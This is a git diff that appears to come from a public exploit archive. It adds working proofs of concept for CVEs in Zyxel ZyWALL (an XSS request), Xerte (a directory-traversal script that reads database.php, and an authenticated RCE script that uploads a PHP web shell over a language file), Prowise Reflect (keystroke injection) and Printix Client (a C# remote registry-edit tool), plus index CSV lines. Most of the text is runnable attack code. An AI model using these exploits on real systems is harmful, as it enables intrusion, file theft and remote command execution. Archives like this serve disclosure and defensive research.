diff --git a/exploits/multiple/webapps/50797.txt b/exploits/multiple/webapps/50797.txt new file mode 100644 index 000000000..9b44053bf --- /dev/null +++ b/exploits/multiple/webapps/50797.txt @@ -0,0 +1,17 @@ +# Exploit Title: Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting (XSS) +# Date: 1/3/2022 +# Exploit Author: Momen Eldawakhly (CyberGuy) +# Vendor Homepage: https://www.zyxel.com +# Version: ZyWALL 2 Plus +# Tested on: Ubuntu Linux [Firefox] +# CVE : CVE-2021-46387 + +GET /Forms/rpAuth_1?id=%3C/form%3E%3CiMg%20src=x%20onerror=%22prompt(1)%22%3E%3Cform%3E HTTP/1.1 +Host: vuln.ip:8080 +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +DNT: 1 +Connection: close +Upgrade-Insecure-Requests: 1 \ No newline at end of file diff --git a/exploits/php/webapps/50794.py b/exploits/php/webapps/50794.py new file mode 100755 index 000000000..d13c627e9 --- /dev/null +++ b/exploits/php/webapps/50794.py @@ -0,0 +1,58 @@ +# Exploit Title: Xerte 3.10.3 - Directory Traversal (Authenticated) +# Date: 05/03/2021 +# Exploit Author: Rik Lutz +# Vendor Homepage: https://xerte.org.uk +# Software Link: https://github.com/thexerteproject/xerteonlinetoolkits/archive/refs/heads/3.9.zip +# Version: up until 3.10.3 +# Tested on: Windows 10 XAMP +# CVE : CVE-2021-44665 + +# This PoC assumes guest login is enabled. Vulnerable url: +# https:///getfile.php?file=/../../database.php +# You can find a userfiles-directory by creating a project and browsing the media menu. +# Create new project from template -> visit "Properties" (! symbol) -> Media and Quota -> Click file to download +# The userfiles-direcotry will be noted in the URL and/or when you download a file. +# They look like: -- + +import requests +import re + +xerte_base_url = "http://127.0.0.1" +file_to_grab = "/../../database.php" +php_session_id = "" # If guest is not enabled, and you have a session ID. Put it here. + +with requests.Session() as session: + # Get a PHP session ID + if not php_session_id: + session.get(xerte_base_url) + else: + session.cookies.set("PHPSESSID", php_session_id) + + # Use a default template + data = { + 'tutorialid': 'Nottingham', + 'templatename': 'Nottingham', + 'tutorialname': 'exploit', + 'folder_id': '' + } + + # Create a new project in order to create a user-folder + template_id = session.post(xerte_base_url + '/website_code/php/templates/new_template.php', data=data) + + # Find template ID + data = { + 'template_id': re.findall('(\d+)', template_id.text)[0] + } + + # Find the created user-direcotry: + user_direcotry = session.post(xerte_base_url + '/website_code/php/properties/media_and_quota_template.php', data=data) + user_direcotry = re.findall('USER-FILES\/([0-9]+-[a-z0-9]+-[a-zA-Z0-9_]+)', user_direcotry.text)[0] + + # Grab file + result = session.get(xerte_base_url + '/getfile.php?file=' + user_direcotry + file_to_grab) + print(result.text) + print("|-- Used Variables: --|") + print("PHP Session ID: " + session.cookies.get_dict()['PHPSESSID']) + print("user direcotry: " + user_direcotry) + print("Curl example:") + print('curl --cookie "PHPSESSID=' + session.cookies.get_dict()['PHPSESSID'] + '" ' + xerte_base_url + '/getfile.php?file=' + user_direcotry + file_to_grab) \ No newline at end of file diff --git a/exploits/php/webapps/50795.py b/exploits/php/webapps/50795.py new file mode 100755 index 000000000..7ed29b034 --- /dev/null +++ b/exploits/php/webapps/50795.py @@ -0,0 +1,185 @@ +# Exploit Title: Xerte 3.9 - Remote Code Execution (RCE) (Authenticated) +# Date: 05/03/2021 +# Exploit Author: Rik Lutz +# Vendor Homepage: https://xerte.org.uk +# Software Link: https://github.com/thexerteproject/xerteonlinetoolkits/archive/refs/heads/3.8.5-33.zip +# Version: up until version 3.9 +# Tested on: Windows 10 XAMP +# CVE : CVE-2021-44664 + +# This PoC assumes guest login is enabled and the en-GB langues files are used. +# This PoC wil overwrite the existing langues file (.inc) for the englisch index page with a shell. +# Vulnerable url: https:///website_code/php/import/fileupload.php +# The mediapath variable can be used to set the destination of the uploaded. +# Create new project from template -> visit "Properties" (! symbol) -> Media and Quota + +import requests +import re + +xerte_base_url = "http://127.0.0.1" +php_session_id = "" # If guest is not enabled, and you have a session ID. Put it here. + +with requests.Session() as session: + # Get a PHP session ID + if not php_session_id: + session.get(xerte_base_url) + else: + session.cookies.set("PHPSESSID", php_session_id) + + # Use a default template + data = { + 'tutorialid': 'Nottingham', + 'templatename': 'Nottingham', + 'tutorialname': 'exploit', + 'folder_id': '' + } + + # Create a new project in order to find the install path + template_id = session.post(xerte_base_url + '/website_code/php/templates/new_template.php', data=data) + + # Find template ID + data = { + 'template_id': re.findall('(\d+)', template_id.text)[0] + } + + # Find the install path: + install_path = session.post(xerte_base_url + '/website_code/php/properties/media_and_quota_template.php', data=data) + install_path = re.findall('mediapath" value="(.+?)"', install_path.text)[0] + + headers = { + 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8', + 'Accept-Language': 'nl,en-US;q=0.7,en;q=0.3', + 'Content-Type': 'multipart/form-data; boundary=---------------------------170331411929658976061651588978', + } + + # index.inc file + data = \ + '''-----------------------------170331411929658976061651588978 +Content-Disposition: form-data; name="filenameuploaded"; filename="index.inc" +Content-Type: application/octet-stream + +"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo ""; die; } +/** + * + * index.php english language file + * + * @author Patrick Lockley + * @version 1.0 + * @copyright Pat Lockley + * @package + */ + +define("INDEX_USERNAME_AND_PASSWORD_EMPTY", "Please enter your username and password"); + +define("INDEX_USERNAME_EMPTY", "Please enter your username"); + +define("INDEX_PASSWORD_EMPTY", "Please enter your password"); + +define("INDEX_LDAP_MISSING", "PHP\'s LDAP library needs to be installed to use LDAP authentication. If you read the install guide other options are available"); + +define("INDEX_SITE_ADMIN", "Site admins should log on on the manangement page"); + +define("INDEX_LOGON_FAIL", "Sorry that password combination was not correct"); + +define("INDEX_LOGIN", "login area"); + +define("INDEX_USERNAME", "Username"); + +define("INDEX_PASSWORD", "Password"); + +define("INDEX_HELP_TITLE", "Getting Started"); + +define("INDEX_HELP_INTRODUCTION", "We\'ve produced a short introduction to the Toolkits website."); + +define("INDEX_HELP_INTRO_LINK_TEXT","Show me!"); + +define("INDEX_NO_LDAP","PHP\'s LDAP library needs to be installed to use LDAP authentication. If you read the install guide other options are available"); + +define("INDEX_FOLDER_PROMPT","What would you like to call your folder?"); + +define("INDEX_WORKSPACE_TITLE","My Projects"); + +define("INDEX_CREATE","Project Templates"); + +define("INDEX_DETAILS","Project Details"); + +define("INDEX_SORT","Sort"); + +define("INDEX_SEARCH","Search"); + +define("INDEX_SORT_A","Alphabetical A-Z"); + +define("INDEX_SORT_Z","Alphabetical Z-A"); + +define("INDEX_SORT_NEW","Age (New to Old)"); + +define("INDEX_SORT_OLD","Age (Old to New)"); + +define("INDEX_LOG_OUT","Log out"); + +define("INDEX_LOGGED_IN_AS","Logged in as"); + +define("INDEX_BUTTON_LOGIN","Login"); + +define("INDEX_BUTTON_LOGOUT","Logout"); + +define("INDEX_BUTTON_PROPERTIES","Properties"); + +define("INDEX_BUTTON_EDIT","Edit"); + +define("INDEX_BUTTON_PREVIEW", "Preview"); + +define("INDEX_BUTTON_SORT", "Sort"); + +define("INDEX_BUTTON_NEWFOLDER", "New Folder"); + +define("INDEX_BUTTON_NEWFOLDER_CREATE", "Create"); + +define("INDEX_BUTTON_DELETE", "Delete"); + +define("INDEX_BUTTON_DUPLICATE", "Duplicate"); + +define("INDEX_BUTTON_PUBLISH", "Publish"); + +define("INDEX_BUTTON_CANCEL", "Cancel"); + +define("INDEX_BUTTON_SAVE", "Save"); + +define("INDEX_XAPI_DASHBOARD_FROM", "From:"); + +define("INDEX_XAPI_DASHBOARD_UNTIL", "Until:"); + +define("INDEX_XAPI_DASHBOARD_GROUP_SELECT", "Select group:"); + +define("INDEX_XAPI_DASHBOARD_GROUP_ALL", "All groups"); + +define("INDEX_XAPI_DASHBOARD_SHOW_NAMES", "Show names and/or email addresses"); + +define("INDEX_XAPI_DASHBOARD_CLOSE", "Close dashboard"); + +define("INDEX_XAPI_DASHBOARD_DISPLAY_OPTIONS", "Display options"); + +define("INDEX_XAPI_DASHBOARD_SHOW_HIDE_COLUMNS", "Show / hide columns"); + +define("INDEX_XAPI_DASHBOARD_QUESTION_OVERVIEW", "Interaction overview"); + +define("INDEX_XAPI_DASHBOARD_PRINT", "Print"); +\r +\r +-----------------------------170331411929658976061651588978 +Content-Disposition: form-data; name="mediapath" + +''' \ + + install_path \ + + '''../../../languages/en-GB/ +-----------------------------170331411929658976061651588978--\r +''' + + # Overwrite index.inc file + response = session.post(xerte_base_url + '/website_code/php/import/fileupload.php', headers=headers, data=data) + print('Installation path: ' + install_path) + print(response.text) + if "success" in response.text: + print("Visit shell @: " + xerte_base_url + '/?cmd=whoami') \ No newline at end of file diff --git a/exploits/windows/remote/50796.html b/exploits/windows/remote/50796.html new file mode 100644 index 000000000..8686988eb --- /dev/null +++ b/exploits/windows/remote/50796.html @@ -0,0 +1,86 @@ +# Exploit Title: Prowise Reflect v1.0.9 - Remote Keystroke Injection +# Date: 30/10/2022 +# Exploit Author: Rik Lutz +# Vendor Homepage: https://www.prowise.com/ +# Version: V1.0.9 +# Tested on: Windows 10 + +# Prowise Reflect software version 1.0.9 for Windows is vulnerable to a remote keystroke injection. +# Much like how a rubber ducky attack works but this works either over the network (when port 8082 is exposed), +# or by visiting a malicious website. This POC contains the malicious webpage. +# Steps: +# 1. Start Prowise reflect +# 2. Try to connect to a reflect server e.q. ygm7u6od +# 3. When it is connecting click exploit +# - Start menu will open, types notepad.exe and types hello world. + + + + + + + + + + + +
+ Exploit! +
+ + + \ No newline at end of file diff --git a/exploits/windows/remote/50798.cs b/exploits/windows/remote/50798.cs new file mode 100644 index 000000000..90aa53344 --- /dev/null +++ b/exploits/windows/remote/50798.cs @@ -0,0 +1,413 @@ +# Exploit Title: Printix Client 1.3.1106.0 - Remote Code Execution (RCE) +# Date: 3/1/2022 +# Exploit Author: Logan Latvala +# Vendor Homepage: https://printix.net +# Software Link: https://software.printix.net/client/win/1.3.1106.0/PrintixClientWindows.zip +# Version: <= 1.3.1106.0 +# Tested on: Windows 7, Windows 8, Windows 10, Windows 11 +# CVE : CVE-2022-25089 +# Github for project: https://github.com/ComparedArray/printix-CVE-2022-25089 + +using Microsoft.Win32; +using Newtonsoft.Json; +using Newtonsoft.Json.Converters; +using System; +using System.Collections.Generic; +using System.Diagnostics; +using System.Linq; +using System.Text; +using System.Threading; +using System.Threading.Tasks; + +/** + * ________________________________________ + * + * Printix Vulnerability, CVE-2022-25089 + * Part of a Printix Vulnerability series + * Author: Logan Latvala + * Github: https://github.com/ComparedArray/printix-CVE-2022-25089 + * ________________________________________ + * + */ + + +namespace ConsoleApp1a +{ + + public class PersistentRegistryData + { + public PersistentRegistryCmds cmd; + + public string path; + + public int VDIType; + + public byte[] registryData; + } + + [JsonConverter(typeof(StringEnumConverter))] + public enum PersistentRegistryCmds + { + StoreData = 1, + DeleteSubTree, + RestoreData + } + public class Session + { + public int commandNumber { get; set; } + public string host { get; set; } + public string data { get; set; } + public string sessionName { get; set; } + public Session(int commandSessionNumber = 0) + { + commandNumber = commandSessionNumber; + switch (commandSessionNumber) + { + //Incase it's initiated, kill it immediately. + case (0): + Environment.Exit(0x001); + break; + + //Incase the Ping request is sent though, get its needed data. + case (2): + Console.WriteLine("\n What Host Address? (DNS Names Or IP)\n"); + Console.Write("IP: "); + host = Console.ReadLine(); + Console.WriteLine("Host address set to: " + host); + + data = "pingData"; + sessionName = "PingerRinger"; + break; + + //Incase the RegEdit request is sent though, get its needed data. + case (49): + Console.WriteLine("\n What Host Address? (DNS Names Or IP)\n"); + Console.Write("IP: "); + host = Console.ReadLine(); + Console.WriteLine("Host address set to: " + host); + + PersistentRegistryData persistentRegistryData = new PersistentRegistryData(); + persistentRegistryData.cmd = PersistentRegistryCmds.RestoreData; + persistentRegistryData.VDIType = 12; //(int)DefaultValues.VDIType; + //persistentRegistryData.path = "printix\\SOFTWARE\\Intel\\HeciServer\\das\\SocketServiceName"; + Console.WriteLine("\n What Node starting from \\\\Local-Machine\\ would you like to select? \n"); + Console.WriteLine("Example: HKEY_LOCAL_MACHINE\\SOFTWARE\\Intel\\HeciServer\\das\\SocketServiceName\n"); + Console.WriteLine("You can only change values in HKEY_LOCAL_MACHINE"); + Console.Write("Registry Node: "); + persistentRegistryData.path = "" + Console.ReadLine().Replace("HKEY_LOCAL_MACHINE","printix"); + Console.WriteLine("Full Address Set To: " + persistentRegistryData.path); + + //persistentRegistryData.registryData = new byte[2]; + //byte[] loader = selectDataType("Intel(R) Capability Licensing stuffidkreally", RegistryValueKind.String); + + Console.WriteLine("\n What Data type are you using? \n1. String 2. Dword 3. Qword 4. Multi String \n"); + Console.Write("Type: "); + int dataF = int.Parse(Console.ReadLine()); + Console.WriteLine("Set Data to: " + dataF); + + Console.WriteLine("\n What value is your type? \n"); + Console.Write("Value: "); + string dataB = Console.ReadLine(); + Console.WriteLine("Set Data to: " + dataF); + + byte[] loader = null; + List byteContainer = new List(); + //Dword = 4 + //SET THIS NUMBER TO THE TYPE OF DATA YOU ARE USING! (CHECK ABOVE FUNCITON selectDataType()!) + + switch (dataF) + { + case (1): + + loader = selectDataType(dataB, RegistryValueKind.String); + byteContainer.Add(1); + break; + case (2): + loader = selectDataType(int.Parse(dataB), RegistryValueKind.DWord); + byteContainer.Add(4); + break; + case (3): + loader = selectDataType(long.Parse(dataB), RegistryValueKind.QWord); + byteContainer.Add(11); + break; + case (4): + loader = selectDataType(dataB.Split('%'), RegistryValueKind.MultiString); + byteContainer.Add(7); + break; + + } + + int pathHolder = 0; + foreach (byte bit in loader) + { + pathHolder++; + byteContainer.Add(bit); + } + + persistentRegistryData.registryData = byteContainer.ToArray(); + //added stuff: + + //PersistentRegistryData data = new PersistentRegistryData(); + //data.cmd = PersistentRegistryCmds.RestoreData; + //data.path = ""; + + + //data.cmd + Console.WriteLine(JsonConvert.SerializeObject(persistentRegistryData)); + data = JsonConvert.SerializeObject(persistentRegistryData); + + break; + //Custom cases, such as custom JSON Inputs and more. + case (100): + Console.WriteLine("\n What Host Address? (DNS Names Or IP)\n"); + Console.Write("IP: "); + host = Console.ReadLine(); + Console.WriteLine("Host address set to: " + host); + + Console.WriteLine("\n What Data Should Be Sent?\n"); + Console.Write("Data: "); + data = Console.ReadLine(); + Console.WriteLine("Data set to: " + data); + + Console.WriteLine("\n What Session Name Should Be Used? \n"); + Console.Write("Session Name: "); + sessionName = Console.ReadLine(); + Console.WriteLine("Session name set to: " + sessionName); + break; + } + + + } + public static byte[] selectDataType(object value, RegistryValueKind format) + { + byte[] array = new byte[50]; + + switch (format) + { + case RegistryValueKind.String: //1 + array = Encoding.UTF8.GetBytes((string)value); + break; + case RegistryValueKind.DWord://4 + array = ((!(value.GetType() == typeof(int))) ? BitConverter.GetBytes((long)value) : BitConverter.GetBytes((int)value)); + break; + case RegistryValueKind.QWord://11 + if (value == null) + { + value = 0L; + } + array = BitConverter.GetBytes((long)value); + break; + case RegistryValueKind.MultiString://7 + { + if (value == null) + { + value = new string[1] { string.Empty }; + } + string[] array2 = (string[])value; + foreach (string s in array2) + { + byte[] bytes = Encoding.UTF8.GetBytes(s); + byte[] second = new byte[1] { (byte)bytes.Length }; + array = array.Concat(second).Concat(bytes).ToArray(); + } + break; + } + } + return array; + } + } + class CVESUBMISSION + { + static void Main(string[] args) + { + FORCERESTART: + try + { + + //Edit any registry without auth: + //Use command 49, use the code provided on the desktop... + //This modifies it directly, so no specific username is needed. :D + + //The command parameter, a list of commands is below. + int command = 43; + + //To force the user to input variables or not. + bool forceCustomInput = false; + + //The data to send, this isn't flexible and should be used only for specific examples. + //Try to keep above 4 characters if you're just shoving things into the command. + string data = "{\"profileID\":1,\"result\":true}"; + + //The username to use. + //This is to fulfill the requriements whilst in development mode. + DefaultValues.CurrentSessName = "printixMDNs7914"; + + //The host to connect to. DEFAULT= "localhost" + string host = "192.168.1.29"; + + // Configuration Above + + InvalidInputLabel: + Console.Clear(); + Console.WriteLine("Please select the certificate you want to use with port 21338."); + //Deprecated, certificates are no longer needed to verify, as clientside only uses the self-signed certificates now. + Console.WriteLine("Already selected, client authentication isn't needed."); + + Console.WriteLine(" /───────────────────────────\\ "); + Console.WriteLine("\nWhat would you like to do?"); + Console.WriteLine("\n 1. Send Ping Request"); + Console.WriteLine(" 2. Send Registry Edit Request"); + Console.WriteLine(" 3. Send Custom Request"); + Console.WriteLine(" 4. Experimental Mode (Beta)\n"); + Console.Write("I choose option # "); + + try + { + switch (int.Parse(Console.ReadLine().ToLower())) + { + case (1): + Session session = new Session(2); + + command = session.commandNumber; + host = session.host; + data = session.data; + DefaultValues.CurrentSessName = "printixReflectorPackage_" + new Random().Next(1, 200); + + + + break; + case (2): + Session sessionTwo = new Session(49); + + command = sessionTwo.commandNumber; + host = sessionTwo.host; + data = sessionTwo.data; + DefaultValues.CurrentSessName = "printixReflectorPackage_" + new Random().Next(1, 200); + + break; + case (3): + + Console.WriteLine("What command number do you want to input?"); + command = int.Parse(Console.ReadLine().ToString()); + Console.WriteLine("What IP would you like to use? (Default = localhost)"); + host = Console.ReadLine(); + Console.WriteLine("What data do you want to send? (Keep over 4 chars if you are not sure!)"); + data = Console.ReadLine(); + + Console.WriteLine("What session name do you want to use? "); + DefaultValues.CurrentSessName = Console.ReadLine(); + break; + case (4): + Console.WriteLine("Not yet implemented."); + break; + } + } + catch (Exception e) + { + Console.WriteLine("Invalid Input!"); + goto InvalidInputLabel; + } + + Console.WriteLine("Proof Of Concept For CVE-2022-25089 | Version: 1.3.24 | Created by Logan Latvala"); + Console.WriteLine("This is a RAW API, in which you may get unintended results from usage.\n"); + + CompCommClient client = new CompCommClient(); + + + byte[] responseStorage = new byte[25555]; + int responseCMD = 0; + client.Connect(host, 21338, 3, 10000); + + client.SendMessage(command, Encoding.UTF8.GetBytes(data)); + // Theory: There is always a message being sent, yet it doesn't read it, or can't intercept it. + // Check for output multiple times, and see if this is conclusive. + + + + //client.SendMessage(51, Encoding.ASCII.GetBytes(data)); + new Thread(() => { + //Thread.Sleep(4000); + if (client.Connected()) + { + int cam = 0; + // 4 itterations of loops, may be lifted in the future. + while (cam < 5) + { + + //Reads the datastream and keeps returning results. + //Thread.Sleep(100); + try + { + try + { + if (responseStorage?.Any() == true) + { + //List byo1 = responseStorage.ToList(); + if (!Encoding.UTF8.GetString(responseStorage).Contains("Caption")) + { + foreach (char cam2 in Encoding.UTF8.GetString(responseStorage)) + { + if (!char.IsWhiteSpace(cam2) && char.IsLetterOrDigit(cam2) || char.IsPunctuation(cam2)) + { + Console.Write(cam2); + } + } + }else + { + + } + } + + } + catch (Exception e) { Debug.WriteLine(e); } + client.Read(out responseCMD, out responseStorage); + + } + catch (Exception e) + { + goto ReadException; + } + Thread.Sleep(100); + cam++; + //Console.WriteLine(cam); + } + + + + + } + else + { + Console.WriteLine("[WARNING]: Client is Disconnected!"); + } + ReadException: + try + { + Console.WriteLine("Command Variable Response: " + responseCMD); + Console.WriteLine(Encoding.UTF8.GetString(responseStorage) + " || " + responseCMD); + client.disConnect(); + } + catch (Exception e) + { + Console.WriteLine("After 4.2 Seconds, there has been no response!"); + client.disConnect(); + } + }).Start(); + + Console.WriteLine(responseCMD); + Console.ReadLine(); + + } + + catch (Exception e) + { + Console.WriteLine(e); + Console.ReadLine(); + + //Environment.Exit(e.HResult); + } + + goto FORCERESTART; + } + } +} \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index f4989230f..8dfd726eb 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -18630,6 +18630,8 @@ id,file,description,date,author,type,platform,port 50781,exploits/windows/remote/50781.txt,"Adobe ColdFusion 11 - LDAP Java Object Deserialization Remode Code Execution (RCE)",1970-01-01,"Amel BOUZIANE-LEBLOND",remote,windows, 50783,exploits/hardware/remote/50783.py,"ICL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 - Remote File CRUD",1970-01-01,LiquidWorm,remote,hardware, 50793,exploits/hardware/remote/50793.txt,"WAGO 750-8212 PFC200 G2 2ETH RS - Privilege Escalation",1970-01-01,"Momen Eldawakhly",remote,hardware, +50796,exploits/windows/remote/50796.html,"Prowise Reflect v1.0.9 - Remote Keystroke Injection",1970-01-01,"Rik Lutz",remote,windows, +50798,exploits/windows/remote/50798.cs,"Printix Client 1.3.1106.0 - Remote Code Execution (RCE)",1970-01-01,"Logan Latvala",remote,windows, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php, @@ -44863,3 +44865,6 @@ id,file,description,date,author,type,platform,port 50786,exploits/php/webapps/50786.rb,"Microweber CMS 1.2.10 - Local File Inclusion (Authenticated) (Metasploit)",1970-01-01,"Talha Karakumru",webapps,php, 50788,exploits/linux/webapps/50788.txt,"Cipi Control Panel 3.1.15 - Stored Cross-Site Scripting (XSS) (Authenticated)",1970-01-01,Ghuliev,webapps,linux, 50792,exploits/multiple/webapps/50792.go,"Casdoor 1.13.0 - SQL Injection (Unauthenticated)",1970-01-01,"Mayank Deshmukh",webapps,multiple, +50794,exploits/php/webapps/50794.py,"Xerte 3.10.3 - Directory Traversal (Authenticated)",1970-01-01,"Rik Lutz",webapps,php, +50795,exploits/php/webapps/50795.py,"Xerte 3.9 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Rik Lutz",webapps,php, +50797,exploits/multiple/webapps/50797.txt,"Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting (XSS)",1970-01-01,"Momen Eldawakhly",webapps,multiple,